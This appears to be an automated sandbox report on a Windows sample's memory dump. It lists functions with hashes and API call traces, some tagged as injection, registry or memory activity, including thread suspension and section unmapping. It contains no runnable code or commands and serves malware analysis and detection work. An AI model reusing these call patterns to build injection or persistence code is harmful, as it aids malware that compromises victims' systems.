  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
